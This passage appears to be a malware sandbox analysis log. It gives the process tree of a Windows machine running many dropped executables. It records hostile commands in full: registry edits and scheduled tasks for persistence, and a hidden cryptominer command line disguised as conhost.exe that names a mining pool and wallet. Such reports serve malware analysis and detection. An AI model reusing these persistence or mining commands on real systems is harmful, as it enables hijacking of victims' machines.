                                                                                                                                              msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                              8⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:2260
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill -im "U6DuogN1ECFWruE4A0SlHzun.exe" -F
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3992
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:4796
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:5768
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
                                                                                                                                      4⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:8532
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcc883dec0,0x7ffcc883ded0,0x7ffcc883dee0
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:9032
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:9436
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1936 /prefetch:8
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:9452
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=2232 /prefetch:8
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:9608
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:1
                                                                                                                                        5⤵
                                                                                                                                          PID:9888
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                                                          5⤵
                                                                                                                                            PID:9896
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=2636 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                              PID:10316
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:2
                                                                                                                                              5⤵
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:11076
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=3400 /prefetch:8
                                                                                                                                              5⤵
                                                                                                                                                PID:12076
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1500 /prefetch:8
                                                                                                                                                5⤵
                                                                                                                                                  PID:13104
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=1644 /prefetch:8
                                                                                                                                                  5⤵
                                                                                                                                                    PID:13096
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,900486238121903849,14209770886045110316,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8532_1870907644" --mojo-platform-channel-handle=3360 /prefetch:8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:13552
                                                                                                                                            • C:\Windows\System32\Upfc.exe
                                                                                                                                              C:\Windows\System32\Upfc.exe /launchtype periodic /cv vtqxg/3+ekOudJ78lsMB4g.0
                                                                                                                                              1⤵
                                                                                                                                                PID:3788
                                                                                                                                              • C:\Windows\System32\sihclient.exe
                                                                                                                                                C:\Windows\System32\sihclient.exe /cv lX+JvkxKV0GZd+6TsanO5Q.0.2
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4216
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4412
                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4212
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                1⤵
                                                                                                                                                  PID:8
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1244 -ip 1244
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:3420
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1744 -ip 1744
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:3504
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 3036
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:876
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1284 -ip 1284
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:5620
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1552 -ip 1552
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:4024
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:5740
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:5648
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 456
                                                                                                                                                      3⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      PID:5988
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5648 -ip 5648
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:5296
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5712 -ip 5712
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:1244
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5328 -ip 5328
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  PID:4116
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4444
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\38C4.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\38C4.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:72
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\38C4.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\38C4.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5396
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\66CA.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\66CA.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3036
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 292
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      PID:7252
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7C18.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7C18.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:5332
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\99B3.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\99B3.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:3988
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C161.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C161.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4668
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:7408
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D5C4.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D5C4.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6844
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 280
                                                                                                                                                          2⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:7660
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3036 -ip 3036
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                        PID:7144
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4668 -ip 4668
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                        PID:7372
                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                        1⤵
                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:7384
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding AEE2B3E6B6325CC75D395BBA30276434 C
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7628
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 30B788BA6E1B47198E49D3ABE38D2DC4
                                                                                                                                                          2⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:8916
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:9556
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 2BC80075FAF964A4AC1D79FC4E7AFA7F E Global\MSI0000
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          PID:12748
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:7492
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 884
                                                                                                                                                            2⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            PID:7704
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:7572
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 6844 -ip 6844
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            PID:7564
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7492 -ip 7492
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            PID:7608
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:7636
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\29E1.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\29E1.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:7776
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:8092
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:8272
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:8440
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:8296
                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      PID:7928
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:7968
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 456
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:8108
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7968 -ip 7968
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                      PID:8056
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6860 -ip 6860
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                      PID:8196
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7172 -ip 7172
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                      PID:8460
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\692D.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\692D.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:8720
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 8720 -s 292
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:10192
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 8720 -ip 8720
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                        PID:9696
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9D0F.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9D0F.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:9720
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:12416
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6666.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\6666.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:13836
                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\6666.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:15376
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:15472
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:15512
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:15568
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:15612
                                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:16032
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:16160
                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:5852
                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:16184
